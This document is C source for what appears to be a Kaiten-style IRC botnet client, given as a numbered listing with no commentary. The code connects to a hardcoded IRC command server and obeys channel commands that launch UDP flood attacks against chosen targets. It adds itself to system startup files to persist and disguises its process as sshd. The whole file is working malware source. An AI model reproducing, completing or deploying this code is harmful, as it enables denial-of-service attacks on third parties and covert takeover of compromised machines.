kaiten.c

1. #define STARTUP //set to define if rooted
2. #undef IDENT
3. #define FAKENAME "/usr/bin/sshd"
4. #define CHAN "#Channel"
5. #define KEY "key"
6. #define PORT 443
7. #define PASS ""
8. #define STD2_STRING "std"
9. #define STD2_SIZE 50
10. #define PREFIX ""
11. int numservers=1;
12. char *servers[] = {
13. "1.1.1.1",
14. (void*)0
15. };
16.  
17. #include <stdarg.h>
18. #include <errno.h>
19. #include <stdio.h>
20. #include <stdlib.h>
21. #include <string.h>
22. #include <sys/types.h>
23. #include <sys/stat.h>
24. #include <fcntl.h>
25. #include <strings.h>
26. #include <netinet/in.h>
27. #include <unistd.h>
28. #include <sys/time.h>
29. #include <sys/socket.h>
30. #include <signal.h>
31. #include <arpa/inet.h>
32. #include <netdb.h>
33. #include <time.h>
34. #include <sys/wait.h>
35. #include <sys/ioctl.h>
36.  
37. int sock,changeservers=0;
38. char *server, *chan, *key, *nick, *ident, *prefix, *user, *pass, disabled=0, udpTry = 0, *adminuser1="Fine";
39. unsigned int *pids;
40. unsigned long spoofs=0, spoofsm=0, numpids=0;
41.  
42. int strwildmatch(unsigned char* pattern, unsigned char* string) {
43. switch((unsigned char)*pattern) {
44. case '\0': return *string;
45. case 'b': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
46. case 'o': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
47. case 't': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
48. case 'B': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
49. case 'O': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
50. case 'T': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
51. case '?': return !(*string && !strwildmatch(pattern+1, string+1));
52. default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
53. }
54. }
55. int Send(int sock, char *words, ...) {
56. static char textBuffer[1024];
57. va_list args;
58. va_start(args, words);
59. vsprintf(textBuffer, words, args);
60. va_end(args);
61. return write(sock,textBuffer,strlen(textBuffer));
62. }
63. unsigned int host2ip(char *sender,char *hostname) {
64. static struct in_addr i;
65. struct hostent *h;
66. if((i.s_addr = inet_addr(hostname)) == -1) {
67. if((h = gethostbyname(hostname)) == NULL) {
68. Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
69. exit(0);
70. }
71. bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
72. }
73. return i.s_addr;
74. }
75. int mfork(char *sender) {
76. unsigned int parent, *newpids, i;
77. if (disabled == 1) {
78. Send(sock,"NOTICE %s :Unable to comply.\n",sender);
79. return 1;
80. }
81. parent=fork();
82. if (parent <= 0) return parent;
83. numpids++;
84. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
85. for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
86. newpids[numpids-1]=parent;
87. free(pids);
88. pids=newpids;
89. return parent;
90. }
91. void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
92. char *makestring() {
93. char *tmp;
94. int len=(rand()%5)+4,i;
95. FILE *file;
96. tmp=(char*)malloc(len+1);
97. memset(tmp,0,len+1);
98. char *pre;
99. if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
100. else {
101. int a=((rand()*rand())%45402)+1;
102. char buf[1024];
103. for (i=0;i<a;i++) fgets(buf,1024,file);
104. memset(buf,0,1024);
105. fgets(buf,1024,file);
106. filter(buf);
107. memcpy(tmp,buf,len);
108. fclose(file);
109. }
110. return tmp;
111. }
112. void identd() {
113. int sockname,sockfd,sin_size,tmpsock,i;
114. struct sockaddr_in my_addr,their_addr;
115. char szBuffer[1024];
116. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
117. my_addr.sin_family = AF_INET;
118. my_addr.sin_port = htons(113);
119. my_addr.sin_addr.s_addr = INADDR_ANY;
120. memset(&(my_addr.sin_zero), 0, 8);
121. if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
122. if (listen(sockfd, 1) == -1) return;
123. if (fork() == 0) return;
124. sin_size = sizeof(struct sockaddr_in);
125. if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
126. for(;;) {
127. fd_set bla;
128. struct timeval timee;
129. FD_ZERO(&bla);
130. FD_SET(tmpsock,&bla);
131. timee.tv_sec=timee.tv_usec=60;
132. if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
133. if (FD_ISSET(tmpsock,&bla)) break;
134. }
135. i = recv(tmpsock,szBuffer,1024,0);
136. if (i <= 0 || i >= 20) exit(0);
137. szBuffer[i]=0;
138. if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
139. if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
140. Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
141. close(tmpsock);
142. close(sockfd);
143. exit(0);
144. }
145.  
146. //STD Attack
147. void std(int sock, char *sender, int argc, char **argv) {
148. if (argc < 3) {
149.  
150. Send(sock,"PRIVMSG %s :>bot +std <target> <port> <secs>\n",chan);
151. exit(1);
152.  
153. }
154. unsigned long secs;
155.  
156. int iSTD_Sock;
157.  
158. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
159.  
160. time_t start = time(NULL);
161. secs = atol(argv[3]);
162. if (mfork(sender) != 0) return;
163. Send(sock,"PRIVMSG %s :[STD]Hitting %s!\n",chan,argv[1]);
164.  
165. struct sockaddr_in sin;
166.  
167. struct hostent *hp;
168.  
169. hp = gethostbyname(argv[1]);
170.  
171. bzero((char*) &sin,sizeof(sin));
172. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
173. sin.sin_family = hp->h_addrtype;
174. sin.sin_port = atol(argv[2]);
175.  
176. unsigned int a = 0;
177.  
178. while(1){
179. if (a >= 50)
180. {
181. send(iSTD_Sock, STD2_STRING, STD2_SIZE, 0);
182. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
183. if (time(NULL) >= start + secs)
184. {
185. Send(sock, "PRIVMSG %s :[STD]Done hitting %s!\n", chan, argv[1]);
186. close(iSTD_Sock);
187. exit(0);
188. }
189. a = 0;
190. }
191. a++;
192. }
193.  
194.  
195. }
196.  
197. void stop(int sock, char *sender, int argc, char **argv){
198. unsigned long i;
199. for (i=0;i<numpids;i++) {
200. if (pids[i] != 0 && pids[i] != getpid()) {
201. if (sender) Send(sock,"PRIVMSG %s :Killing pid %d.\n",chan,pids[i]);
202. kill(pids[i],9);
203. }
204. }
205. }
206.  
207. void unknown(int sock, char *sender, int argc, char **argv) {
208. int flag=1,fd,i;
209. unsigned long secs;
210. char *buf=(char*)malloc(9216);
211. struct hostent *hp;
212. struct sockaddr_in in;
213.  
214. time_t start=time(NULL);
215.  
216. if (mfork(sender) != 0) return;
217.  
218. if (argc != 2) {
219. Send(sock,"PRIVMSG %s :>bot +unknown <target> <secs>\n",chan);
220. exit(1);
221. }
222.  
223. secs=atol(argv[2]);
224.  
225. memset((void*)&in,0,sizeof(struct sockaddr_in));
226.  
227. in.sin_addr.s_addr=host2ip(sender,argv[1]);
228. in.sin_family = AF_INET;
229.  
230. Send(sock,"PRIVMSG %s :[UNK]Hitting %s!\n",chan,argv[1]);
231.  
232. while(1) {
233.  
234. in.sin_port = rand();
235.  
236. if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0){
237. } else {
238. flag=1;
239. ioctl(fd,FIONBIO,&flag);
240. sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
241. close(fd);
242. }
243.  
244. if (i >= 50) {
245. if (time(NULL) >= start+secs) break;
246. i=0;
247. }
248. i++;
249. }
250. Send(sock,"PRIVMSG %s :[UNK]Done hitting %s!\n",chan,argv[1]);
251. close(fd);
252. exit(0);
253. }
254.  
255. //Kill the bot
256. void killsec(int sock, char *sender, int argc, char **argv) {
257.  
258. if(strcasecmp(adminuser1,sender) == 0){
259.  
260. kill(0,9);
261.  
262. } else {
263.  
264. Send(sock,"PRIVMSG %s :Nice try...\n", chan);
265.  
266. }
267. }
268.  
269. struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
270. { "+std" , std },
271. { "+stop" , stop },
272. { "+unknown" , unknown },
273. { "Kkt9x4JApM0RuSqCLA" , killsec },
274. { (char *)0, (void (*)(int,char *,int,char **))0 } };
275.  
276. void _PRIVMSG(int sock, char *sender, char *str) {
277. int i;
278. char *to, *message;
279.  
280. for (i=0;i<strlen(str) && str[i] != ' ';i++);
281. str[i]=0;
282. to=str;
283. message=str+i+2;
284. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
285. sender[i]=0;
286. if (*message == '>' && !strcasecmp(to,chan)) {
287. char *params[12], name[1024]={0};
288. int num_params=0, m;
289. message++;
290. for (i=0;i<strlen(message) && message[i] != ' ';i++);
291. message[i]=0;
292. if (strwildmatch(message,nick)) return;
293. message+=i+1;
294. m=strlen(message);
295. for (i=0;i<m;i++) {
296. if (*message == ' ' || *message == 0) break;
297. name[i]=*message;
298. message++;
299. }
300. for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
301. num_params++;
302. if (num_params > 10) num_params=10;
303. params[0]=name;
304. params[num_params+1]="\0";
305. m=1;
306. while (*message != 0) {
307. message++;
308. if (m >= num_params) break;
309. for (i=0;i<strlen(message) && message[i] != ' ';i++);
310. params[m]=(char*)malloc(i+1);
311. strncpy(params[m],message,i);
312. params[m][i]=0;
313. m++;
314. message+=i;
315. }
316. for (m=0; flooders[m].cmd != (char *)0; m++) {
317. if (!strcasecmp(flooders[m].cmd,name)) {
318. flooders[m].func(sock,sender,num_params-1,params);
319. for (i=1;i<num_params;i++) free(params[i]);
320. return;
321. }
322. }
323. }
324. }
325. void _376(int sock, char *sender, char *str) {
326. Send(sock,"MODE %s +pixB\n",nick);
327. Send(sock,"JOIN %s :%s\n",chan,key);
328. Send(sock,"WHO %s\n",nick);
329. }
330. void _PING(int sock, char *sender, char *str) {
331.  
332. Send(sock,"PONG %s\n",str);
333.  
334. }
335.  
336. void _352(int sock, char *sender, char *str) {
337. int i,d;
338. char *msg=str;
339. struct hostent *hostm;
340. unsigned long m;
341. for (i=0,d=0;d<5;d++) {
342. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
343. if (i == strlen(str)) return;
344. }
345. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
346. msg[i]=0;
347. if (!strcasecmp(msg,nick) && !spoofsm) {
348. msg=str;
349. for (i=0,d=0;d<3;d++) {
350. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
351. if (i == strlen(str)) return;
352. }
353. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
354. msg[i]=0;
355. if ((m = inet_addr(msg)) == -1) {
356. if ((hostm=gethostbyname(msg)) == NULL) {
357. Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
358. return;
359. }
360. memcpy((char*)&m, hostm->h_addr, hostm->h_length);
361. }
362. ((char*)&spoofs)[3]=((char*)&m)[0];
363. ((char*)&spoofs)[2]=((char*)&m)[1];
364. ((char*)&spoofs)[1]=((char*)&m)[2];
365. ((char*)&spoofs)[0]=0;
366. spoofsm=256;
367. }
368. }
369. void _433(int sock, char *sender, char *str) {
370. free(nick);
371. char tempnick[50];
372. char *strpref = PREFIX;
373. char *genname = makestring();
374. strcpy(tempnick,strpref);
375. strcat(tempnick,genname);
376. nick=tempnick;
377. }
378.  
379. struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
380. { "352", _352 },
381. { "376", _376 },
382. { "433", _433 },
383. { "422", _376 },
384. { "PRIVMSG", _PRIVMSG },
385. { "PING", _PING },
386. { (char *)0, (void (*)(int,char *,char *))0 } };
387. void con() {
388. struct sockaddr_in srv;
389. unsigned long ipaddr,start;
390. int flag;
391. struct hostent *hp;
392. start:
393. sock=-1;
394. flag=1;
395. if (changeservers == 0) server=servers[rand()%numservers];
396. changeservers=0;
397. while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
398. if (inet_addr(server) == 0 || inet_addr(server) == -1) {
399. if ((hp = gethostbyname(server)) == NULL) {
400. server=NULL;
401. close(sock);
402. goto start;
403. }
404. bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
405. }
406. else srv.sin_addr.s_addr=inet_addr(server);
407. srv.sin_family = AF_INET;
408. srv.sin_port = htons(PORT);
409. ioctl(sock,FIONBIO,&flag);
410. start=time(NULL);
411. while(time(NULL)-start < 10) {
412. errno=0;
413. if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
414. setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
415. setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
416. setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
417. return;
418. }
419. if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
420. sleep(1);
421. }
422. server=NULL;
423. close(sock);
424. goto start;
425. }
426. int main(int argc, char *argv[]) {
427. int on,i;
428. char cwd[256],*str;
429. FILE *file;
430. #ifdef STARTUP
431. str="/etc/rc.d/rc.local";
432. file=fopen(str,"r");
433. if (file == NULL) {
434. str="/etc/rc.conf";
435. file=fopen(str,"r");
436. }
437. if (file != NULL) {
438. char outfile[256], buf[1024];
439. int i=strlen(argv[0]), d=0;
440. getcwd(cwd,256);
441. if (strcmp(cwd,"/")) {
442. while(argv[0][i] != '/') i--;
443. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
444. while(!feof(file)) {
445. fgets(buf,1024,file);
446. if (!strcasecmp(buf,outfile)) d++;
447. }
448. if (d == 0) {
449. FILE *out;
450. fclose(file);
451. out=fopen(str,"a");
452. if (out != NULL) {
453. fputs(outfile,out);
454. fclose(out);
455. }
456. }
457. else fclose(file);
458. }
459. else fclose(file);
460. }
461. #endif
462. if (fork()) exit(0);
463. #ifdef FAKENAME
464. strncpy(argv[0],FAKENAME,strlen(argv[0]));
465. for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
466. #endif
467. srand((time(NULL) ^ getpid()) + getppid());
468. char tempnick[50];
469. char *strpref = PREFIX;
470. char *genname = makestring();
471.  
472. strcpy(tempnick,strpref);
473. strcat(tempnick,genname);
474.  
475. nick=tempnick;
476. ident="STD";
477. user="STD IRC Bot";
478. chan=CHAN;
479. key=KEY;
480. pass=PASS;
481. server=NULL;
482. sa:
483. #ifdef IDENT
484. for (i=0;i<numpids;i++) {
485. if (pids[i] != 0 && pids[i] != getpid()) {
486. kill(pids[i],9);
487. waitpid(pids[i],NULL,WNOHANG);
488. }
489. }
490. pids=NULL;
491. numpids=0;
492. identd();
493. #endif
494.  
495. con();
496. Send(sock,"PASS %s\n", pass);
497. Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
498. while(1) {
499. unsigned long i;
500. fd_set n;
501. struct timeval tv;
502. FD_ZERO(&n);
503. FD_SET(sock,&n);
504. tv.tv_sec=60*20;
505. tv.tv_usec=0;
506. if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
507. for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
508. unsigned int *newpids,on;
509. for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
510. pids[on-1]=0;
511. numpids--;
512. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
513. for (on=0;on<numpids;on++) newpids[on]=pids[on];
514. free(pids);
515. pids=newpids;
516. }
517. if (FD_ISSET(sock,&n)) {
518. char buf[4096], *str;
519. int i;
520. if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
521. buf[i]=0;
522. str=strtok(buf,"\n");
523. while(str && *str) {
524. char name[1024], sender[1024];
525. filter(str);
526. if (*str == ':') {
527. for (i=0;i<strlen(str) && str[i] != ' ';i++);
528. str[i]=0;
529. strcpy(sender,str+1);
530. strcpy(str,str+i+1);
531. }
532. else strcpy(sender,"*");
533. for (i=0;i<strlen(str) && str[i] != ' ';i++);
534. str[i]=0;
535. strcpy(name,str);
536. strcpy(str,str+i+1);
537. for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
538. if (!strcasecmp(name,"ERROR")) goto sa;
539. str=strtok((char*)NULL,"\n");
540. }
541. }
542. }
543. return 0;
544. }